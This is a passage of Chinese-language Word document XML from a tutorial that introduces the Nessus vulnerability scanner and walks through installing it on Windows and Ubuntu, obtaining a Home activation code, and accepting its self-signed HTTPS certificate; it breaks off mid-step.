        <w:t>Nessus号称是世界上最流行的漏洞扫描程序，全世界有超过75000个组织在使用它。该工具提供完整的电脑漏洞扫描服务，并随时更新其漏洞数据库。Nessus通常包括成千上万的最新的漏洞，各种各样的扫描选项，及易于使用的图形界面和有效的报告。Nessus之所以被人们喜爱，是因为该工具具有几个特点。如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供完整的电脑漏洞扫描服务，并随时更新其漏洞数据库。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不同于传统的漏洞扫描软件。Nessus可同时在本机或远程控制，进行系统的漏洞分析扫描。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其运作效能随着系统的资源而自行调整。如果将主机配置更多的资源（如加快CPU速度或增加内存大小），其效率表现可因为丰富资源而提高。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可自行定义插件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NASL（Nessus Attack Scripting Language）是由Tenable所发出的语言，用来写入Nessus的安全测试选项。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完全支持SSL（Secure Socket Layer）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="24" w:name="_Toc499884700"/>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:t>Nessus</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Nessus工具不仅可以在电脑上使用，而且还可以在手机上使用。下面将主要介绍在windows操作系统平台上安装Nessus工具的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.获取Nessus安装包</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Nessus的官方下载地址是：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://www.tenable.com/products/nessus/select-your-operating-system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在浏览器中输入以上地址，将打开如下图</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所示的界面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="706E6A0E" wp14:editId="56E796A4">
            <wp:extent cx="5274310" cy="33629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362960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从该界面可以看到Nessus有适合不同操作系统的版本，这里我们选择适用windows系统的版本下载。在该界面单击Nessus Home下面的Download按钮，将显示如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下图</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所示的界面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D8AFFA7" wp14:editId="287E56A0">
            <wp:extent cx="5267325" cy="3171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F15694" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从该界面可以看到，官网提供了Nessus工具各种平台的安装包，如Windows、Mac OS X、Linux、FreeBSD等。用户可以根据自己的操作系统及架构，选择对应的安装包。例如，下载Windows 64位架构的包，则单击Nessus-6.10.4-x64.msi。下载好后直接运行安装。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="003E6996" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Nessus工具</w:t>
      </w:r>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>下安装</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面将以</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为例，介绍在Linux下安装Nessus工具的方法。具体操作步骤如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（1）从官网上下载安装包。本例中下载的安装包文件名为Nessus-6.10.4-</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:t>ubuntu1110_amd64.deb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（2）将下载的安装包复制到</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，本例中复制到/mnt/myspace/下。接下来，就可以安装Nesus工具了。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11CE115E" wp14:editId="297D0370">
            <wp:extent cx="5499088" cy="2049145"/>
            <wp:effectExtent l="0" t="0" r="6985" b="8255"/>
            <wp:docPr id="51" name="图片 51" descr="D:\QQ消息\408122431\Image\C2C\1YX3QJEPCC3O7$KSYGHZ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QQ消息\408122431\Image\C2C\1YX3QJEPCC3O7$KSYGHZN`4.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0938" cy="2053561"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看到输出以上类似信息，则表示Nessus工具安装完成。接下来，用户在浏览器的地址栏中输入https://Server:8834/或https://IP:8834，即可访问Nessus服务。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提示：在Linux系统中，Nessus工具默认安装在/opt/nessus目录中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同样，如果要在Linux下使用Nessus工具，也需要先激活该服务。其中，激活方法和Windows下的激活方法是相同的。唯一不同的是，信任证书方式不同。如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（1）在RHEL 6.4的浏览器地址栏中输入https://IP:8834，访问Nessus服务。本例中，主机的IP地址是192.168.1.102，所以输入的地址为https://192.168.1.102:8834/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。在浏览器地址栏中输入该地址后，将打开如下图</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所示的界面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BF9B3AF" wp14:editId="756F0BCD">
            <wp:extent cx="5104765" cy="1987550"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="52" name="图片 52" descr="http://static.oschina.net/uploads/space/2015/0710/145310_mfMo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oschina.net/uploads/space/2015/0710/145310_mfMo_158585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4765" cy="1987550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意：Nessus服务使用的是https协议，而不是http协议。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（2）在该界面显示该连接不受信任。这是因为Nessus是一个安全连接（HTTPS协议），所以需要被信任后才允许登录。此时，在该界面单击“我已充分了解可能的风险”选项，将显示如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上图</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所示的界面。 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（3）该界面显示了该连接可能存在的风险。此时，单击“添加例外”按钮，将显示如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下图</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所示的界面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00917920">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40249F66" wp14:editId="5803E37F">
            <wp:extent cx="4158615" cy="1828800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="54" name="图片 54" descr="http://static.oschina.net/uploads/space/2015/0710/145310_wZCp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oschina.net/uploads/space/2015/0710/145310_wZCp_158585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8615" cy="1828800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="003E6996" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（4）在该界面单击“确认安全例外”按钮，将显示如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上图</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所示的界面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="25" w:name="_Toc499884701"/>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>激活</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>essus</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在使用Nessus之前，必须先激活该服务才可使用。如果要激活Nessus服务，则需要到官网获取一个激活码。下面将介绍获取激活码的方法。具体操作步骤如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（1）在浏览器中输入以下地址：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://www.nessus.org/products/nessus/nessus-plugins/obtain-an-activation-code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功访问以上链接后，将打开如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下图</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所示的界面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="283B5801" wp14:editId="07ABE22D">
            <wp:extent cx="5274310" cy="38919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891915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里有三个版本的激活码获取方式，分别是Home（家庭版）和Professional（专业版）和Manager（管理版）。这两个版本的区别如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>家庭版：家庭版是免费的，主要是供非商业性或个人使用。该版比较适合个人使用，并且可以用于非专业的环境。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>专业版：专业版是需要付费的。但是，可以免费使用七天。该版主要是供商业人士使用。它包括技术支持或附加功能，如无线并发连接等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管理版：相对专业版管理版支持更强的管理功能，包括多用户扫描管理，漏洞资源管理，补丁管理等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694"/>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（2）这里我们选择免费的家庭版，在该界面单击Nessus Home Free下面的Register Now按钮，将显示如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下图</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所示的界面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68109A95" wp14:editId="600735D8">
            <wp:extent cx="5274310" cy="16592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659255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（3）在该界面填写一些信息，为了获取激活码。在该界面First Name和Last Name文本框中，用户可以任意填写。但是，Email下的文本框必须填写一个合法的邮件地址，用来获取邮件。当以上信息设置完成后，单击Register按钮。接下来，将会在注册的邮箱中收到一份关于Nessus的邮件。进入邮箱打开收到的邮件，将会看到一串数字，类似XXXX-XXXX-XXXX-XXXX，即激活码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（4）在浏览器中访问</w:t>
      </w:r>
      <w:hyperlink r:id="rId197" w:history="1">
        <w:r w:rsidRPr="00917920">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>https://</w:t>
        </w:r>
        <w:r w:rsidRPr="00917920">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>localhost://8834</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者在软件安装完成时点击finish会自动打开对应的url，就可以使用以上获取到的激活码来激活该服务了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FA99901" wp14:editId="785F86AA">
            <wp:extent cx="5263515" cy="2027555"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="58" name="图片 58" descr="http://static.oschina.net/uploads/space/2015/0710/145201_bmV3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oschina.net/uploads/space/2015/0710/145201_bmV3_158585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3515" cy="2027555"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（7）如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上图</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所示该界面提示访问Nessus服务需要通过SSL协议，在该界面点击clicking here</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>链接，将打开如下图</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所示的界面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00917920">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03BE16A8" wp14:editId="2E77D7EA">
            <wp:extent cx="3260090" cy="2154555"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="59" name="图片 59" descr="http://static.oschina.net/uploads/space/2015/0710/145201_6fgR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oschina.net/uploads/space/2015/0710/145201_6fgR_158585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0090" cy="2154555"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>图1.8 安全证书</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（8）该界面提示证书存在错误，是因为该站点使用了不受信任的自签名的SSL证书。如果确认该站点没问题，则单击“继续浏览此网站”选项，将显示如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下图</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
